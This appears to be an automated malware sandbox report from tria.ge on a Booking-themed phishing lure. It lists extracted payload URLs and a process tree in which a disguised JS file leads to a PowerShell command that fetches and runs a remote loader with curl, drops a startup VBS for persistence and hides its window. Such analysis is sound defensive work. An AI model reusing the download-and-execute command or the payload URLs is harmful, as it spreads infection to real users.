Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22/11/2024, 16:56
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
https://hoteltoscanaplaza.com.co/booking/tool/1xx.txt
https://hoteltoscanaplaza.com.co/booking/tool/1type.txt
https://hoteltoscanaplaza.com.co/booking/tool/1tron.vbs.pdf
https://hoteltoscanaplaza.com.co/booking/tool/1Execute.txt
https://hoteltoscanaplaza.com.co/booking/tool/1Framework.txt
https://hoteltoscanaplaza.com.co/booking/tool/1invoke.txt
https://hoteltoscanaplaza.com.co/booking/tool/1load.txt
https://hoteltoscanaplaza.com.co/booking/tool/1method.txt
https://hoteltoscanaplaza.com.co/booking/tool/1msg.txt
https://hoteltoscanaplaza.com.co/booking/tool/1runpe.txt
https://hoteltoscanaplaza.com.co/booking/tool/1tron.bat.pdf
https://hoteltoscanaplaza.com.co/booking/tool/1tron.ps1.pdf
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 118 2928 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 5072 powershell.exe 3164 powershell.exe 4528 powershell.exe 2928 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VHF.vbs powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-940901362-3608833189-1915618603-1000\{57C77943-9473-420A-89F2-8A84D422BE25} msedge.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings powershell.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 791307.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 4588 msedge.exe 4588 msedge.exe 4928 msedge.exe 4928 msedge.exe 4912 identity_helper.exe 4912 identity_helper.exe 3596 msedge.exe 3596 msedge.exe 4528 powershell.exe 4528 powershell.exe 4528 powershell.exe 2928 powershell.exe 2928 powershell.exe 2928 powershell.exe 3788 msedge.exe 3788 msedge.exe 2884 msedge.exe 2884 msedge.exe 2884 msedge.exe 2884 msedge.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe 5072 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4528 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 3164 powershell.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
pid Process 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe 4928 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4928 wrote to memory of 4960 4928 msedge.exe 83 PID 4928 wrote to memory of 4960 4928 msedge.exe 83 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 232 4928 msedge.exe 84 PID 4928 wrote to memory of 4588 4928 msedge.exe 85 PID 4928 wrote to memory of 4588 4928 msedge.exe 85 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86 PID 4928 wrote to memory of 4252 4928 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://amerian-financeiro.papudoproducoes.com/accounts/195363/messages/11/clicks/30515/19?envelope_id=71⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4e6546f8,0x7ffe4e654708,0x7ffe4e6547182⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:22⤵PID:232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:82⤵PID:4252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:12⤵PID:1716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:12⤵PID:2552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:12⤵PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:60
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵PID:4464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4716 /prefetch:82⤵PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:12⤵PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:2372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:1212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:12⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:12⤵PID:4076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵PID:1220
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Solicitacao de Reserva Colaboradores Amerian Document.pdf _JS4334590324_AMERIAN.MJS.JS"2⤵
- Checks computer location settings
PID:4504 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://account.booking.com/sign-in?op_token=EgVvYXV0aCJHChQ2Wjcyb0hPZDM2Tm43emszcGlyaBIJYXV0aG9yaXplGhpodHRwczovL2FkbWluLmJvb2tpbmcuY29tLyoCe31CBGNvZGUqEjCk3OzCvbMlOgBCAFjunbCQBg3⤵PID:4500
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffe4e6546f8,0x7ffe4e654708,0x7ffe4e6547184⤵PID:876
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command $teste1 = ('C:\Users\' + [System.Environment]::UserName + '\AppData\Roaming\teste.ps1') ;curl.exe https://hoteltoscanaplaza.com.co/booking/tool/loader.txt -o $teste1 ;powershell.exe -ExecutionPolicy Bypass -file $teste1 ;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" https://hoteltoscanaplaza.com.co/booking/tool/loader.txt -o C:\Users\Admin\AppData\Roaming\teste.ps14⤵PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file C:\Users\Admin\AppData\Roaming\teste.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\1tron.vbs"5⤵
- Checks computer location settings
PID:2492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\1tron.bat" "6⤵PID:4728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.e"xe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\1tron.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"8⤵PID:3720
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\1tron.vbs"5⤵
- Checks computer location settings
PID:4652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\1tron.bat" "6⤵PID:4792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.e"xe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\1tron.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵PID:4796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:12⤵PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5332 /prefetch:82⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6896 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:12⤵PID:3356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14634278746256285455,6421951332687250750,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5340 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1664
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3600
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x510 0x4481⤵PID:2332
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5fe614eeb389ef6c3fe10929ae828f952
SHA122990055ff48007b4d67fdf14fcaf6982ed73a64
SHA25604e49ed3cb3de3e8b8fd47d7c6614c2c8f5fa86078e2d556f32ad32999bf2e81
SHA512f64d97850c2f632bb9417d5e5a567625a6c317d65c64162d4ae298571b84419a3add06a9ddb1535144a9af5fa3f4c1517625a678424475668ca373afb41c1e91
-
Filesize
152B
MD5e55832d7cd7e868a2c087c4c73678018
SHA1ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f
-
Filesize
152B
MD5c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA14d16a7e82190f8490a00008bd53d85fb92e379b0
SHA2561e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize504B
MD581d296fb70c05057aefacc42a7d4eab0
SHA183ab56c2772272997a9898b1d93338c04c1f2ed2
SHA2561f72263b39d37d3e0b138917d8e6b4da51fd855f8a6e4deae7a3aec6bdf18570
SHA512c26de9053044abc492cc879d553ced71cf66f1076fd68947dc5e0593124e99bb813ca240199a31825a3c7bc8c7b35276bf6c5c2f2d6b6f28146e721093e4b45c
-
Filesize
5KB
MD56641e96c564c70b567c147a50156ac22
SHA19de0c89d22537bcb6fccef042230013b2942b6d3
SHA25657a6a0199b960052a215f6785fcb5e20b7ad68714a994d8a07b817b0a5ef0b19
SHA5122deac3f6cf11cc33ce4d32f18f87bfa0657a10f5453a1f0c4ae4bc3eaa40062a5c034098691cfd6d6810b57e89ce62b558006c824986e689e98f93f5a0a7494b
-
Filesize
7KB
MD56df7af19d3a622fc3ca11e00be7ab817
SHA136e47c0845f8752c95f0ffbbd7f1d9a38d2156ce
SHA256d836f3a86940913dbd98ed921f440fdf4dbdd3449dffde824e0021f8731fd3b9
SHA51235ee30419019dd751a461a74ada4b3def07f65d658f850876ee8a7410658c5d2f5779b3b4966d7898ee8d9d6b1f319fdb9f0d5db9c66016fdaf26385c8610e8a
-
Filesize
6KB
MD5dde2a2cc73132ada4b46fcfcedabbcfd
SHA19e53b374e550f4d3a9bd8bb096531a3873e68b46
SHA256bb3ac6e359acde3c1c38e6b2e6fc3a333c811f04c69e4c76bc20da830f8e39f6
